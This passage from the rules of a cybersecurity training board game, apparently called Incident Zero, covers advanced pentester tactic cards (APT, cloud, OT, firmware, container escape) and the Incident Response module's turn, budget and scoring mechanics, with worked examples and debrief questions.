Description: A pentester simulates an Advanced Persistent Threat (APT) campaign that maintains presence across multiple turns. Each turn, the APT performs new reconnaissance, persistence, lateral movement, or data exfiltration activities. The Blue Team must detect and eradicate the APT before it achieves critical objectives. This is a multi-turn challenge that escalates difficulty.

Attack Details: - Multi-turn challenge (lasts 2-3 turns of main game) - Targets: Long-term detection, threat hunting, incident response procedures - Each turn the APT performs an action; Blue Team must detect and respond - If APT achieves 3 objectives (e.g., 3 successful data exfils), game is lost

Turn-by-Turn APT Actions: - Turn 1: Reconnaissance (scan network, enumerate users, identify critical assets) - Turn 2: Lateral movement (move to file server, domain controller) - Turn 3: Persistence establishment (add backdoor, create hidden user account) - Turn 4 (if still active): Data exfiltration (steal customer database) - Turn 5+ (if still active): Destruction phase (delete logs, trigger ransomware)

Defending Against APT:

Each turn, Blue Team must roll 1d20 to detect the APT activity:

Outcome: - Blue Team Succeeds (roll ≥ current DC, base 16): APT detected and eradicated before achieving 3 objectives - Blue Team Fails (roll < current DC): APT progresses to next action; if 3 objectives achieved, game is lost

Special Rule - Escalating Difficulty: Each turn the APT remains undetected, DC increases by 1 (Turn 1: DC 16, Turn 2: DC 17, Turn 3: DC 18, etc.)

Teaching Point: APTs are sophisticated, well-resourced, and patient. They expect to remain undetected for months or years. Early detection is critical. Continuous monitoring, threat intelligence integration, and advanced hunting are essential for APT detection.


PT-13: Cloud-Specific Attack - Misconfigured Cloud Resources

Tactic Type: Cloud Security / Privilege Escalation Target Vectors: MALWARE, CREDENTIAL_ABUSE, NETWORK, DATA_EXFIL Difficulty: ADVANCED (defeat DC 14)

Description: A pentester discovers misconfigured cloud resources (S3 bucket, Azure storage, GCP database) that are accessible without authentication. They pivot from compromised workstation to cloud infrastructure, exfiltrating sensitive data stored in cloud. Can your cloud security controls catch this lateral movement into cloud?

Attack Details: - Targets: Cloud security posture management, identity & access management in cloud - Assumes: Blue Team has cloud infrastructure in their network design - Success indicates: Misconfigured cloud resources, weak cloud IAM policies - Blue Team rolls 1d20 to detect and remediate

Defending Defenses: - D-04 (Firewall Rules): +1 bonus (limits cloud connectivity from compromised systems) - D-20 (Zero Trust Access): +2 bonus (requires proper identity & authorization for cloud access) - D-21 (Container Security): +2 bonus (blocks cloud API abuse if containerized) - D-22 (SIEM Enterprise): +2 bonus (detects unusual cloud API calls) - D-24 (Threat Intelligence): +1 bonus (known misconfigured bucket signatures) - New Special Defense - Cloud Posture Mgmt: +3 bonus (automatically detects and remediates misconfigurations)

Special Cloud Defense: If Blue Team deployed cloud-specific hardening (e.g., cloud security posture management tools, cloud-native IAM), add +2 bonus.

Outcome: - Blue Team Succeeds (14+): Misconfiguration detected and remediated before exfiltration - Blue Team Fails: Cloud data is exfiltrated; -1 penalty to all rolls for remainder of game, plus immediate 15 Budget cost for cloud forensics

Teaching Point: Cloud security is fundamentally different from on-premises. Shared responsibility model requires organizations to actively manage cloud configuration. Cloud misconfigurations are the #1 cloud vulnerability. Continuous posture scanning is essential.


PT-14: IoT/OT Compromise - Industrial Network Attack

Tactic Type: Operational Technology Attack / Physical Safety Impact Target Vectors: NETWORK, MALWARE Difficulty: ADVANCED (defeat DC 14)

Description: A pentester compromises IoT or Operational Technology (OT) devices (industrial control systems, HVAC, building management, manufacturing systems) that are connected to the corporate network. Unlike IT systems (computers, servers), OT systems prioritize availability and cannot be patched frequently. Can your network architecture prevent OT compromise, and can you detect it before physical systems are affected?

Attack Details: - Targets: Network segmentation between IT and OT, OT-specific monitoring - Assumes: Blue Team has IoT/OT devices in their network design - Success indicates: Lack of network segmentation or OT-specific monitoring - Blue Team rolls 1d20 to detect and isolate

Defending Defenses: - D-04 (Firewall Rules): +1 bonus (separates IT from OT traffic) - D-09 (Network Segmentation): +3 bonus (dedicated OT segment with restricted access) - D-10 (SIEM Correlation): +1 bonus (detects OT anomalies if properly tuned) - D-22 (SIEM Enterprise): +2 bonus (advanced OT monitoring and correlation) - New Special Defense - OT Monitoring: +3 bonus (specialized tools detect OT compromise)

Special OT Defense: If Blue Team has deployed OT-specific monitoring and segmentation, add +2 bonus.

Outcome: - Blue Team Succeeds (14+): OT compromise detected and isolated before impact - Blue Team Fails: OT systems compromised; physical operations affected, -2 penalty to all rolls for remainder of game, plus potential safety/liability consequences (narrative impact)

Teaching Point: OT security is distinct from IT security. OT systems cannot be patched like IT systems. Network segmentation is the primary defense. OT-specific monitoring and threat hunting are essential. Organizations with manufacturing, utilities, or building management need specialized OT security strategies.


PT-15: Firmware/BIOS Attack - Bootloader Compromise

Tactic Type: Persistence / Hardware-Level Attack Target Vectors: MALWARE, NETWORK Difficulty: EXPERT (defeat DC 15)

Description: A pentester with physical or remote access targets system firmware (BIOS/UEFI) or bootloader, establishing persistence at the hardware level below the operating system. This attack survives OS reinstalls and even hardware replacement (if firmware is deployed via supply chain). Can your controls detect and prevent firmware-level attacks?

Attack Details: - Targets: Firmware integrity, secure boot verification, hardware attestation - Success indicates: Lack of UEFI Secure Boot, no firmware validation, no TPM - Blue Team rolls 1d20 to detect firmware tampering

Defending Defenses: - D-16 (Credential Guard & Secure Boot): +3 bonus (UEFI Secure Boot prevents unauthorized firmware) - D-17 (Malware Sandbox): +1 bonus only (doesn't catch firmware-level attacks) - D-13 (Threat Hunting): +2 bonus (advanced hunting detects firmware persistence) - New Special Defense - Hardware Attestation: +3 bonus (TPM verification detects firmware changes) - New Special Defense - Supply Chain Verification: +2 bonus (validates firmware integrity from trusted source)

Special Firmware Defense: If Blue Team deployed secure boot, TPM attestation, and hardware validation, add +2 additional bonus.

Outcome: - Blue Team Succeeds (15+): Firmware tampering detected and system reimaged - Blue Team Fails: Firmware-level persistence established; -2 penalty to all rolls for remainder of game, Blue Team loses control of compromised system

Teaching Point: Firmware attacks are extremely sophisticated but increasingly common in APT campaigns. Secure Boot and TPM are standard defenses but must be enabled and properly configured. Firmware supply chain security is critical. Organizations should consider firmware integrity verification in procurement.


PT-16: Privilege Escalation - Containerized Environment Escape

Tactic Type: Privilege Escalation / Container Escape Target Vectors: MALWARE, NETWORK Difficulty: EXPERT (defeat DC 15)

Description: A pentester, operating from within a compromised container, exploits a container runtime vulnerability (like CVE-2019-5736 runc exploit) to escape the container and gain access to the underlying host system. From there, lateral movement to other containers and host systems becomes possible. Can your container security and patching strategies prevent container escape?

Attack Details: - Targets: Container runtime patching, container isolation, runtime security - Assumes: Blue Team has containerized workloads (Docker, Kubernetes, etc.) - Success indicates: Unpatched container runtime or lack of runtime monitoring - Blue Team rolls 1d20 to prevent or detect escape

Defending Defenses: - D-03 (Patching): +2 bonus (ensures container runtime is patched) - D-08 (EDR): +2 bonus (detects suspicious syscalls attempting escape) - D-13 (Threat Hunting): +2 bonus (hunting for container escape indicators) - D-21 (Container Security): +4 bonus (runtime security detects and blocks escape attempts) - New Special Defense - Kubernetes Security Policies: +2 bonus (network policies and pod security policies restrict escape)

Special Container Defense: If Blue Team has deployed comprehensive container security (runtime monitoring + pod security policies + network policies), add +2 additional bonus.

Outcome: - Blue Team Succeeds (15+): Container escape prevented or detected before host compromise - Blue Team Fails: Attacker escapes container to host; immediate +1 for all subsequent attacks, gains ability to compromise other containers

Teaching Point: Container security is distinct from traditional OS security. Container runtimes have historically had significant vulnerabilities. Runtime security monitoring is essential. Kubernetes network policies and pod security standards are critical controls. Organizations using containers must keep runtimes patched and actively monitor for escape attempts.


Advanced Tactics Summary

Card Tactic Vectors Difficulty Primary Defense
PT-09 Multi-Vector Attack Multiple ADVANCED (DC 14) Integrated Response
PT-10 Zero-Day Exploitation MALWARE, WEB EXPERT (DC 15) Behavioral Detection
PT-11 Ransomware Deployment MALWARE, EXFIL, NETWORK EXPERT (DC 15) Backup & DR
PT-12 APT Campaign Multiple EXPERT+ (DC 16) Threat Hunting
PT-13 Cloud Misconfiguration Multiple ADVANCED (DC 14) Cloud Posture
PT-14 IoT/OT Compromise NETWORK, MALWARE ADVANCED (DC 14) OT Segmentation
PT-15 Firmware Attack MALWARE, NETWORK EXPERT (DC 15) Hardware Attestation
PT-16 Container Escape MALWARE, NETWORK EXPERT (DC 15) Runtime Security

Gameplay Recommendations

When to Use Advanced Tactics

  1. Experienced Teams: Players familiar with core tactics (PT-01 to PT-08)
  2. Longer Games: Extend Hardening gameplay to 9 turns instead of the standard 7 (v2.2)
  3. Specialized Environments: Organizations with cloud, IoT, or containerized infrastructure
  4. Challenge Play: Teams want more difficulty and realism

Suggested Advanced Scenarios

Scenario A: Cloud-Native Hardening (6 turns) - Turn 1-3: Deploy cloud-specific defenses + container security - Turn 4: PT-13 (Cloud Misconfiguration) challenge - Turn 5: PT-16 (Container Escape) challenge - Turn 6: Final defense evaluation

Scenario B: APT Defense (8 turns) - Turns 1-4: Deploy enterprise-grade defenses (SIEM, threat hunting, forensics) - Turns 5-7: PT-12 (APT Campaign) multi-turn challenge - Turn 8: Eradication and recovery

Scenario C: Zero-Day & Ransomware (7 turns) - Turns 1-3: Deploy behavioral detection + backup systems - Turn 4: PT-10 (Zero-Day) challenge - Turn 5: PT-11 (Ransomware) challenge - Turns 6-7: Recovery and hardening improvements


Design Philosophy

Each Advanced Tactic represents modern, sophisticated threat scenarios that:

  1. Are realistic - Based on actual APT campaigns, zero-day vulnerabilities, ransomware attacks
  2. Require advanced defenses - Cannot be defeated by basic controls alone
  3. Teach emerging threats - Cloud security, containerization, firmware, OT compromise
  4. Encourage specialization - Teams must choose focus areas (cloud, OT, containers) and accept vulnerability elsewhere
  5. Create strategic dilemmas - Limited budget forces difficult prioritization choices

Print Instructions

  1. Print on cardstock (250 gsm minimum)
  2. Use distinct color scheme from core tactics (suggest: DARK RED background to indicate "advanced threat")
  3. Core tactics have lighter red; advanced tactics have darker red (visual difficulty progression)
  4. Cut along dotted lines
  5. Keep separate from core Pentester Tactic Cards until players are ready for advanced challenges

Special Rules for Advanced Tactics

Difficulty Escalation

Advanced tactics can be introduced gradually: - Start with PT-09 (Multi-Vector) and PT-10 (Zero-Day) - Once mastered, add PT-11 (Ransomware) and PT-13 (Cloud) - Save PT-12 (APT), PT-14 (OT), PT-15 (Firmware), PT-16 (Container) for expert play

Synergy with Core Tactics

Advanced tactics build on concepts from core tactics: - PT-09 (Multi-Vector) combines concepts from PT-01 to PT-08 - PT-10 (Zero-Day) extends PT-05 (Priv Esc) concepts - PT-12 (APT) extends PT-02 (Malware Evasion) concepts

Future Expansion

Possible additional advanced tactics: - PT-17: Machine Learning Model Poisoning - PT-18: Quantum-Resistant Cryptography Breaking - PT-19: Supply Chain Compromise (Deep Dive) - PT-20: Geopolitical Nation-State Attack Simulation


Hardening Module: Advanced Pentester Tactics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/rules/module-incident-response.md

Incident Response Module: Rules & Mechanics

Version: 2.2 - Playtest Edition Last Updated: July 2026


Module Overview

The Incident Response Module is the foundation of Incident Zero. Players act as a security operations center (SOC) team responding to an active cyberattack. The core challenge: reveal a hidden attack chain before time runs out or budget is exhausted.

This module teaches: - Primary: Cyber kill chain understanding, threat detection, evidence gathering - Secondary: Resource prioritization, incident response under pressure, forensic investigation

Key Mechanics: - Hidden attack chain (3-5 Threat Cards) is pre-built by the Threat Orchestrator - Blue Team reveals cards by successful investigation (two successes on the same chain link, v2.2) or by deploying a vector+step-matching defense - Uncontained Threats Penalty creates urgency—revealed threats cost 5 Budget per turn until contained - Active Breach Cost (v2.2)—while any chain card remains hidden, the breach itself costs 5 Budget per turn (dwell time is never free) - Emergency Response action provides a way to contain uncontained threats (15 Budget, v2.2)


Module Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

Difficulty Chain Length Starting Budget Turn Limit Best For
Beginner 3 cards 100 7 turns First playthrough, basic learning
Intermediate 4 cards 100 9 turns Standard play, mixed experience
Advanced 5 cards 100 11 turns Experienced players, challenge

Scaling Notes: - Beginner: ~30 min session, teaches full kill chain with comfortable pace - Intermediate: ~40 min session, requires focused investigation strategy - Advanced: ~45 min session, demands efficient resource allocation and quick thinking - Advanced Threat Orchestrators can instead use the Tier + d4 system in Core Rules §3a

2. Threat Orchestrator Preparation

Create the Hidden Attack Chain: 1. Select 3-5 Threat Cards from the deck 2. Arrange them in logical attack chain sequence: - First card: INITIAL COMPROMISE - Middle cards: PIVOT & ESCALATE, PERSISTENCE - Final card: C2 & EXFIL 3. Write down clues for each hidden card on separate paper (keep hidden from Blue Team) 4. Place relevant Asset Cards on the table (visible to all—provides scenario context). Asset Cards are shared components: see cards/network-building/core-deck/asset-cards.md

Attack Chain Strategy Tips: - Start simple (Beginner): Phishing → Lateral Movement → Database Exfil - Intermediate: Phishing → Credential Dumping → VPN Access → Persistence → C2 Beaconing - Advanced: Web Exploit → Lateral Movement → Privilege Escalation → Data Staging → Exfiltration

Recommended First-Time Scenario (3 cards, 30 minutes): 1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

3. Blue Team Setup

Initialize trackers and materials:

Item Starting Value
Turn Tracker 1
Budget Tracker 100
Uncontained Threats Tracker 0
Defense Cards Draw 5 (face down)

4. Read the Opening Scenario

Threat Orchestrator delivers opening narrative using only the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets.

You have limited time and budget to investigate before the attacker escalates. What do you do?"


Gameplay Loop (25-35 minutes)

Round Structure

Each turn represents approximately 2-4 hours of incident response operations.

COMPLETE TURN SEQUENCE:

1. START OF TURN - Apply Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget from the tracker - Apply Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (the hidden breach is doing damage while you can't see it) - Announce current turn number and budget remaining - Example: "Turn 3. Start-of-turn costs: 5 for your uncontained threat, plus 5 Active Breach Cost—the chain isn't fully mapped yet. Budget drops from 85 to 75."

2. BLUE TEAM'S TURN (2-3 minutes discussion) - Team discusses incident response strategy - Decides on ONE action to take this turn (Investigate, Deploy Defense, or Emergency Response) - Team member announces action and parameters (what they're investigating, which defense they're deploying, etc.)

3. ACTION RESOLUTION - Perform chosen action (see three actions below) - Roll 1d20 if action requires a roll - Apply modifiers (see modifier rules in core-rules.md) - Resolve outcome immediately

4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 new Defense Card (add to hand) - Check if game has been won or lost (see victory/defeat conditions below) - If still playing, return to START OF TURN

Sequential Discovery (v2.2 clarification)

The attack chain is discovered in order: only the earliest unrevealed chain card can be investigated toward or revealed. Clues, investigation successes, and Deploy Defense reveals all target that card until it is face-up, then attention shifts to the next link. This matches how the clue system walks the kill chain.

Deployed Defense Persistence (v2.2)

Deployed defenses stay on the table and keep working. Whenever the chain link currently being targeted has an Attack Vector matching a deployed defense's Countermeasure Vector, add +2 to Investigate and Deploy Defense rolls against that link. The Threat Orchestrator (who knows the hidden vector) announces when this bonus applies—hearing "your deployed defenses are helping here" is itself a useful clue. This rule is stated once here; other sections simply refer to it.


Three Incident Response Actions

Action 1: Investigate 🔎

Cost: 5 Budget per action Roll Required: roll + modifiers ≥ 11 on d20 Special Rule: Modifiers apply and can stack

How It Works:

  1. Team describes what they're investigating (email headers, system logs, network traffic, memory dumps, etc.)
  2. Provide technical justification for your investigation approach
  3. Roll 1d20
  4. Compare: roll + modifiers ≥ 11?

Roll Modifiers:

Bonus When Awarded Examples
+2 Strong technical justification "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds. This helps us understand the initial compromise vector."
+1 Real security tools/techniques referenced "We'll query our SIEM for scheduled task creation events" or "We're checking for Mimikatz usage in memory"
+2 Deployed Defense Persistence (v2.2) A deployed defense's vector matches the targeted chain link (see rule above)
+0 Vague investigation "We want to find suspicious activity"

Success (roll + modifiers ≥ 11) — Investigation successes accumulate (v2.2): - First success against a chain link: TO provides a verbal clue about that card (the earliest unrevealed card in the chain) - Second success against the same chain link: THE CARD IS REVEALED! Place it face-up; it becomes uncontained (add 1 to the Uncontained Threats Tracker) and the team chooses a Discovery Reward - Clues should be dramatic and progressive—give more detail with each successful investigation - Budget is spent (5 is deducted)

Failure (roll + modifiers < 11): - "Your investigation yields no actionable intelligence at this time" - Budget is spent anyway (5 is deducted) - Team learns nothing but advances in time - Failure is realistic—not every investigation uncovers information - Failures do NOT count toward the two accumulated successes

Strategic Consideration: - Cheap action (only 5 Budget) - Moderate success chance (need 11+ on d20, so ~50% without bonuses) - Two successful investigations reveal a card without needing the right Defense Card in hand (v2.2) - Deploy Defense (full match) is faster—one successful roll—but costs more and needs the right card


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on Defense Card tier: BASIC/ADVANCED/ELITE) Roll Required: roll + modifiers ≥ 11 on d20 Special Rule: Modifiers apply; matching defense to threat reveals cards immediately

How It Works:

  1. Choose a Defense Card from your hand (or any card in your hand)
  2. Target a specific Asset or threat vector (state what you're defending)
  3. Explain your strategy (optional but encouraged for +2 modifier): "Why is this defense appropriate for the current situation?"
  4. Roll 1d20
  5. Compare: roll + modifiers ≥ 11?

Roll Modifiers: Same as Investigate action (+2 for justification, +1 for tools, +2 Deployed Defense Persistence if applicable)

Success (roll + modifiers ≥ 11):

Check if Defense Card matches the earliest unrevealed hidden threat (sequential discovery): - FULL MATCH: Defense Countermeasure Vector matches threat's Attack Vector AND it's the correct step in the chain - THREAT CARD IS REVEALED IMMEDIATELY! Threat card is placed face-up on the table. Blue Team learns what they've been fighting. - Threat card is now "uncontained" (add 1 to Uncontained Threats Tracker) - Defense Card is discarded (used) - Budget is spent

Failure (roll + modifiers < 11): - Defense fails to deploy properly - Budget is spent anyway - Card is discarded - No progress made, but team learns from failure

Key Point: Even "unsuccessful" Defense deployments can be strategically valuable. Deployed defenses stay in play and grant +2 to rolls against later threats that match their vector (v2.2).

Strategic Consideration: - Expensive action (10-25 Budget, scales with defense tier) - Moderate success chance (same 11+ threshold as Investigate) - Two potential rewards: Defense deployment AND card reveal - High-risk/high-reward compared to Investigate

Example Scenario:

Hidden attack chain: Phishing → Lateral Movement → Database Exfil

Team believes phishing is happening (first card).
They deploy D-01 "Email Authentication Setup" (BASIC, 10 Budget).
Email Authentication addresses SOCIAL ENGINEERING vector.

Roll: 8 + 2 (strong justification) = 10 = FAIL
Email deployment fails, 10 Budget spent, card discarded.

Next turn: Same team deploys D-02 "User Security Training" (BASIC, 10 Budget).
Roll: 13 + 1 = 14 = SUCCESS
Defense addresses SOCIAL ENGINEERING vector and is INITIAL COMPROMISE step.
PHISHING CAMPAIGN REVEALED! Threat card placed face-up.
Uncontained Threats increases to 1 (now costing 5 Budget per turn).

Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25; flat cost) Roll Required: None—this always succeeds Special Rule: Only works on previously revealed threats

How It Works:

  1. Choose a revealed Threat Card still in play (face-up on table)
  2. Describe your containment strategy in detail:
  3. Quarantine infected systems
  4. Disable compromised accounts
  5. Isolate network segments
  6. Kill active processes
  7. Revoke stolen credentials
  8. etc.
  9. Pay the 15 Budget cost
  10. Card is immediately removed from play
  11. Uncontained Threats Tracker decreases by 1 (penalty stops for this threat)

Strategic Use Cases:

Example Timeline (one action per turn):

Turn 3: Deploy Defense succeeds → PHISHING revealed → Uncontained Threats = 1
Turn 4: START → Deduct 5 (uncontained) + 5 (Active Breach Cost, 2 cards still hidden)
        ACTION → Emergency Response on Phishing: pay 15 Budget
        → Phishing removed from play, Uncontained Threats = 0
Turn 5: START → Deduct only 5 (Active Breach Cost; no uncontained threats)

Uncontained Threats & Active Breach Cost

These are the core urgency mechanics of Incident Response. Dwell time costs money—whether you can see the threat or not.

How the Uncontained Threats Penalty Works

Step 1: Threat Revealed - When a Threat Card is successfully revealed (by two investigation successes or a full-match defense deployment) - Add 1 to the Uncontained Threats Tracker - This threat is now "active" and dangerous

Step 2: Penalty Applied at Turn Start - At the START of every turn, deduct 5 Budget per uncontained threat - Example: 2 uncontained threats = 10 Budget penalty each turn - This creates continuous pressure—you MUST contain threats or lose resources

Step 3: Auto-Mitigation - When the next card in the attack chain is revealed, the previous uncontained threat is automatically "contained" (represents shift of attention to new priority) - Uncontained Threats Tracker decreases by 1 - Penalties decrease immediately

Step 4: Emergency Response Containment - Team can use Emergency Response action to immediately remove a threat from the board - Cost: 15 Budget (v2.2) - Uncontained Threats Tracker decreases by 1

Active Breach Cost (v2.2)

Example Walkthrough (v2.2 — recomputed)

SETUP: 3-card chain (Phishing → Lateral Movement → Database Exfil)
Budget 100, Turn Limit 7 [(3 × 2) + 1]

Turn 1: START → Active Breach Cost -5 (95). No uncontained threats.
        INVESTIGATE email headers (-5, 90). Roll succeeds.
        → 1st success vs. link 1: clue about the phishing campaign.

Turn 2: START → Active Breach Cost -5 (85).
        INVESTIGATE mail gateway logs (-5, 80). Roll succeeds.
        → 2nd success vs. link 1: ✓ PHISHING CAMPAIGN REVEALED (investigation reveal, v2.2)
        Uncontained Threats = 1. Reward: Budget Grant +10 (90).

Turn 3: START → -5 (uncontained) -5 (Active Breach) = 80.
        INVESTIGATE network logs (-5, 75). Roll succeeds.
        → 1st success vs. link 2: clue about SMB lateral movement.

Turn 4: START → -5 (uncontained) -5 (Active Breach) = 65.
        DEPLOY D-09 Network Segmentation (ADVANCED, -15, 50). Roll succeeds.
        FULL MATCH (NETWORK vector, PIVOT & ESCALATE step)
        → ✓ LATERAL MOVEMENT REVEALED immediately (deploy reveal)
        Phishing auto-mitigates; Lateral Movement now uncontained (still 1 total).
        Reward: Budget Grant +10 (60).

Turn 5: START → -10 (50).
        INVESTIGATE database access logs (-5, 45). Roll fails. No progress.

Turn 6: START → -10 (35).
        INVESTIGATE DLP alerts (-5, 30). Roll succeeds.
        → 1st success vs. link 3: clue about bulk data leaving the database.

Turn 7: START → -10 (20).
        DEPLOY D-11 Data Loss Prevention (ADVANCED, -15, 5). Roll succeeds.
        FULL MATCH (DATA EXFIL vector, C2 & EXFIL step)
        → ✓ DATABASE EXFILTRATION REVEALED — final card!
        Victory is checked IMMEDIATELY (before any start-of-turn penalties).

WIN on the final turn with 5 Budget remaining.

(Arithmetic check, turn by turn: 100 → 95 → 90 | 85 → 80 → +10 = 90 | 80 → 75 | 65 → 50 → +10 = 60 | 50 → 45 | 35 → 30 | 20 → 5.)


Winning & Losing

Victory Condition ✓

Blue Team wins Incident Response if: 1. ALL threat cards in the attack chain are revealed (face-up on table), AND 2. This happens within the turn limit (7/9/11 by chain length, per Core Rules §3a)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties would apply. Revealing the last card on your final turn with 0 Budget remaining is still a win.

Defeat Condition ✗

Blue Team loses Incident Response if: 1. Turn Tracker exceeds the turn limit with unrevealed cards remaining, OR 2. The team cannot take any legal action (see Budget Edge Rules below)

Losing Scenarios: - Turns expired with only 2 of 4 cards revealed = attack succeeded - Budget too low to afford any action = response ran out of resources

Budget Edge Rules (v2.2)

Victory Scoring (Optional)

If you want to measure quality of victory:

Victory Points Formula:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / Starting Budget) × 50

Examples:
- 4 of 4 cards revealed, 35 Budget remaining: (4/4 × 50) + (35/100 × 50) = 50 + 17.5 = 67.5/100 (Victory with good efficiency)
- 3 of 4 cards revealed, 15 Budget remaining: (3/4 × 50) + (15/100 × 50) = 37.5 + 7.5 = 45/100 (Partial victory, struggled)
- 2 of 4 cards revealed, 0 Budget: (2/4 × 50) + (0 × 50) = 25/100 (Defeat)

Discovery Rewards

When your team successfully reveals a Threat Card, immediately choose ONE of these rewards:

Reward Option 1: Intelligence Bonus 📚

Reward Option 2: Budget Grant 💰

Reward Option 3: Fast-Track Investigation 🚀

Important: Choose only ONE reward per card reveal. Cannot combine rewards.


Debrief & Reflection (5-10 minutes)

Every game should conclude with guided reflection connecting game mechanics to real security concepts.

For Winners (Questions about Success)

  1. "What was your investigation strategy? What worked best?"
  2. Explore which investigation themes were most successful
  3. Discuss whether they targeted the right logs/evidence first

  4. "Which action type was most effective for you—Investigate or Deploy Defense?"

  5. Some teams succeed with heavy investigation, others with defense-focused discovery
  6. Both are valid; discuss trade-offs (v2.2: investigation reveals need two successes but cost less)

  7. "How did the Uncontained Threats penalty and Active Breach Cost affect your decisions?"

  8. Did they force you to make reactive decisions?
  9. Were they realistic representations of incident response and dwell-time costs?

  10. "If you replayed, what would you do differently?"

  11. Reflection on optimization and efficiency
  12. Planning better strategies for next playthrough

For Losers (Questions about Learning)

  1. "What went wrong in your investigation? Where did you get stuck?"
  2. Identify which threat was hardest to detect and why
  3. Discuss investigation approaches that didn't work

  4. "Would you have benefited from more defense deployments vs. investigations?"

  5. Analyze if budget allocation strategy was optimal
  6. Discuss risk/reward trade-offs

  7. "How would you investigate differently if you could replay?"

  8. Recovery and learning from failure
  9. Strategic adjustments for next attempt

  10. "What was the attacker's complete kill chain?"

  11. TO reveals the full hidden attack chain (all cards, clues, explanations)
  12. Discussion of what signals should have tipped them off

For Everyone (Real-World Connection)

  1. "What was the attacker's complete kill chain? Which step was most critical?"
  2. Understand the full attack story
  3. Discuss which card took longest to detect and why

  4. "Why isn't this easy to detect in real-world networks?"

  5. Real attacks hide in massive volumes of legitimate traffic
  6. Attackers use living-off-the-land techniques
  7. Detection requires specific telemetry (EDR, SIEM, network monitoring)

  8. "What tool or process would have helped you detect faster?"

  9. Threat hunting
  10. Behavioral analytics
  11. Specific log sources (PowerShell logs, Sysmon, Zeek)
  12. User and Entity Behavior Analytics (UEBA)

  13. "How does game dwell time compare to real breaches?"

  14. Average dwell time in real breaches: 200+ days
  15. Game represents 2-8 hours of focused investigation
  16. The Active Breach Cost models why every day of dwell time hurts

Tips for Threat Orchestrators

Before the Game (Preparation)

  1. Read the module rules completely - Understand Investigate, Deploy Defense, and Emergency Response mechanics
  2. Prepare your attack chain - Pre-build or write down your 3-5 hidden cards in sequence
  3. Write clear clues - For each card, write 2-3 progressive clues that reveal information gradually (v2.2: expect up to two clue deliveries per card before an investigation reveal)
  4. Organize materials - Sort Defense Cards by tier, prepare trackers, have dice ready
  5. Practice reading clues dramatically - Deliver them with narrative flair to create engagement

Crafting Effective Clues

Poor clue (too vague, gives nothing away): - "You find something suspicious" - "There's a threat somewhere"

Bad clue (gives it away completely): - "The attacker used Mimikatz to dump credentials from LSASS memory" - "You have a database exfiltration happening right now"

Good clue (progressive disclosure, dramatic delivery): - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Excellent clue (specific without revealing, creates narrative): - "Your EDR shows PowerShell activity with suspicious encoding. Memory access patterns suggest credential harvesting. Your domain admin cached credentials appear to have been targeted."

Balancing Difficulty During Play

The game is TOO EASY if: - Team reveals all cards in the first half of the turn limit with 60+ Budget remaining - Multiple consecutive successful rolls (unlikely with d20) - Clues are too specific/obvious - Team makes no difficult decisions

Action: Make clues more subtle, reduce starting budget next time, or add extra card to chain

The game is TOO HARD if: - Team gets stuck after revealing only 1 card (4+ turns with no progress) - Multiple consecutive failed rolls - Team is frustrated rather than challenged - Team is out of ideas about what to investigate

Action: Provide more explicit clues, increase starting budget, reduce chain length

Adjustment Options: - Chain Length: 3 (easier) vs. 4 (medium) vs. 5 (harder) — the turn limit scales automatically via (chain × 2) + 1 - Clue Quality: More specific/obvious (easier) vs. subtle (harder) - Starting Budget: 80 (harder) vs. 100 (medium) vs. 120 (easier) - Turn Limit: formula −1 (harder) vs. formula (medium) vs. formula +1 (easier)

Running Competitive Games (Multiple Teams)

If running for tournament or competitive context:

  1. Assign different attack chains to each team (or same chain for scoring comparison)
  2. Teams cannot see each other's progress (prevents copying strategies)
  3. Scoring: First team to reveal all cards wins; tiebreaker is most Budget remaining
  4. Set clear turn/budget limits before game starts
  5. Track publicly so teams know they're racing against time/budget

Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 minutes)

Attack Chain: 1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) 2. T-06: Mimikatz Credential Dumping (PIVOT & ESCALATE - CREDENTIAL ABUSE) 3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

Starting Budget: 100 Turn Limit: 7 [(3 × 2) + 1]

Narrative Setup:

"Your startup just deployed a new customer database. An employee clicked a malicious link in an email claiming to be from IT. Security monitoring detected unusual PowerShell activity after that. Now you're investigating what happened."

Focus: Teaching full kill chain detection (initial → credential harvesting → data theft) Expected Duration: 30 minutes Best For: First-time players, classroom introduction

Sample Defenses in Starting Hand: - D-01: Email Authentication Setup (BASIC, 10) - D-02: User Security Training (BASIC, 10) - D-07: Multi-Factor Authentication (ADVANCED, 15) - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-11: Data Loss Prevention (ADVANCED, 15)


Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 minutes)

Attack Chain: 1. T-02: Watering Hole Attack (INITIAL COMPROMISE - WEB EXPLOIT) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-07: Scheduled Task Persistence (PERSISTENCE - MALWARE) 4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)

Starting Budget: 100 Turn Limit: 9 [(4 × 2) + 1]

Narrative Setup:

"Your organization's industry-specific website was silently compromised last month. A sophisticated attacker injected malicious code that targeted specific visitor browsers. One of your engineers visited the site and became infected. You're detecting strange network activity but aren't sure what's happening."

